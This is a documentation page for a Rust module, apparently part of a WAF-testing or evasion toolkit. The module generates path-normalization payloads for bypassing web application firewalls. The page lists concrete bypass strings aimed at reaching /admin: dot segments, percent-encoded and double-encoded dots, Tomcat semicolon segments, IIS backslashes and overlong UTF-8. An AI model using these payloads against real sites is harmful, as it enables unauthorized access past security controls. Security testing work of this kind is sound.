Skip to main content

Module path_norm

Module path_norm 

Source
Expand description

Path-normalization differential encoders (dot-segment variants, percent-encoded slash/dot, double-encoded, Tomcat semicolon, IIS backslash, fullwidth slash, overlong UTF-8 dot). Each variant is RFC 3986 §5.2.4-equivalent to the same target — but most WAFs don’t run that exact algorithm. Path-normalization differential encoders.

WAFs and origins frequently disagree on how to normalize a request path. The WAF inspects the raw bytes; the origin (or a middlebox upstream of it) folds them into something else. This module produces the differential payloads — a path that the WAF sees as benign and the origin sees as /admin, or vice versa.

Every encoder here is reversible by the canonical RFC 3986 §5.2.4 “remove dot segments” algorithm. WAFs that don’t run that exact algorithm — including most regex-based WAFs and several major cloud-WAF parsers as recently as 2025 — see a different string.

Coverage:

  • Dot-segment variants: /foo/../admin, /foo/./admin, /foo/././admin, /foo//admin, /foo/.//admin, /foo//../admin. Pure ASCII, RFC-3986 collapse target = /admin.
  • Percent-encoded dot/slash: /foo/%2e%2e/admin (lower), /foo/%2E%2E/admin (upper), /foo/%2e%2E/admin (mixed), /foo/%2e%2e%2fadmin, /foo/..%2fadmin, /foo/.%2e/admin (literal-dot + encoded-dot).
  • Double percent encoding: /foo/%252e%252e/admin — bypasses WAFs that decode once and check, while origins that decode twice collapse to /admin.
  • Tomcat semicolon segment: /foo/..;/admin. The ..; is a single path segment per RFC but Tomcat/Jetty strip the ;<param> suffix and re-evaluate, exposing the parent directory.
  • Encoded semicolon: /foo/..%3b/admin.
  • Backslash variants (IIS / .NET): /foo/..\\admin, /foo/%5c..%5c/admin. IIS folds backslash to slash; most WAFs don’t.
  • Question-mark suffix smuggle: /foo?/../admin — some WAFs normalize before query-string split, some after.
  • Hash suffix smuggle: /foo#/../admin — same shape.
  • Unicode fullwidth slash: /foo/../admin (U+FF0F). NFKC-folding backends collapse to /.
  • Mixed dot encodings: /foo/%c0%ae%c0%ae/admin — overlong UTF-8 for .. Combined with crate::encoding::structural::overlong_utf8 it’s the “mod_security 922110” class.

Functions§

deep_path_collapse
Build a deeply-nested benign path that RFC-3986 collapses to target.
path_variants
Generate every path-normalization differential variant for a target path, given a benign prefix to nest under.
rfc3986_remove_dot_segments
Apply RFC 3986 §5.2.4 “Remove Dot Segments” to a path. Returns the canonical post-normalization path so tests and oracles can verify that every variant collapses to the same target.
slash_encoded_path
Produce a path that uses ONLY percent-encoded slashes, so a WAF that splits on literal / sees one segment but the origin (after percent-decoding) sees the full path.